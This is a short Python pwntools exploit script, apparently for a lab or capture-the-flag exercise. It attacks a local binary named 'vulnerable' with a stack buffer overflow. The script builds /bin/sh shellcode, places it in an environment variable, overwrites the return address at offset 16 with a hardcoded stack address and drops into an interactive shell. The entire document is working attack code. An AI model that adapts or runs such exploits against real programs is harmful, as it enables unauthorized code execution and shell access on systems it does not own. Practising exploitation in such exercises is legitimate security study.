#!/usr/bin/env python

from pwn import *

context.binary = "./vulnerable"

# Generate vars: a shellcode, return address offset, target address.
shellcode = asm(shellcraft.sh())
ret_offset = 16
target = 0x7fffffffeba4

# Generate process, with SHELLCODE as an env var.
io = process('./vulnerable', env= { 'SHELLCODE' : shellcode })

# Craft payload.
payload = b"A" * ret_offset
payload += pack(target)

# Send payload.
io.sendline(payload)

io.interactive()